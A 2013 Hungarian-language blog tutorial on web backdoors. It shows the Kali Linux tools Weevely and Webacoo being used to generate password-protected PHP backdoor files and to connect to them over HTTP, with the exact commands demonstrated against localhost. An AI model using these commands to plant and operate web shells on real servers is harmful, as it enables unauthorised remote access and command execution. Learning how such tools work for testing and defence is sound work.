2013. december 18., szerda

Web Backdoorok

Sziasztok! Ma a web backdoorokról fogok írni.
Mi a backdoor?
A backdoor magyarul hátsó ajtó/kapu-t jelent vagyis ha fel tudjuk juttatni egy gépre akkor fel tudunk csatlakozni rá a mi gépünkről. Vannak ezek a speciális backdoorok amik pont a te gépedre vannak beállítva és más gépről nem is lehet rácsatlakozni mert ugye más gép más ip cím... Az első program amit bemutatnék az a Weevely. Ez a program képes web backdoorokat generálni úgy értem, hogy ha feltesszük egy szerverre és aztán megadjuk a programnak,hogy http://localhost/backdoor.php akkor fel fog csatlakozni a szerverre a backdooron keresztül. Ez a program nagyon okos. Pythonban írták, kali linuxon alapból van csak írd be, hogy weevely. Én ezeket a példákat a saját gépemen fogom mutatni mivel nem volt kedvem külön szervert csinálni neki. :D


Na akkor kezdjük is. Írd be a konzolba, hogy weevely és kijön a használati utasítás, generáljuk le a backdoor-t. Parancs:
weevely generate jelszo /root/backdoor.php
A jelszó után azt kell írni,hogy hova mentse és milyen néven pl:
weevely generate topiary /home/hacker/backdoor.php
Így néz ki az elkészített backdoor forrása:
Ezt fel kell tennünk egy szerverre és működésbe hozni. Ha fent van akkor annyit kell csinálni,hogy http://localhost/backdoor.php és aztán fel tudunk csatlakozni rá ha megnyitjuk akkor nem kell meglepődni, hogy csak a nagy ürességet látod :)
Fel lehet csatlakozni rá:
weevely url jelszó
pl: weevely http://localhost/backdoor.php topiary Akkor kell meglepődni ha nem akar csatlakozni, akkor már lehet idegeskedni :D
Fel vagyunk csatlakozni deamonként.
A következő program amit bemutatnék a Webacoo. Ez is hasonló a weevelyhez kalin van alapból írd be, hogy webacoo. Tud ő is elég sok mindent különböző funkciói vannak nem csak system shell hanem van exec is meg pár más is nézegessétek. :)
Generáljuk le a php fájlt webacoo -g -o backdoor.php
Ez az egyszerű backdoor a funkciókat lehet állítani a -f paraméterrel
Na akkor nem is húzom az időt :)
Ebben is vannak titkosított kódot nézzétek meg :)
Ha fent van a backdoor akkor pl így lehet felmenni:
webacoo -t -u http://localhost/backdoor.php
És ha minden jó akkor bent is vagyunk :)

Ennyi lenne remélem érthető volt kösz,hogy elolvastad :)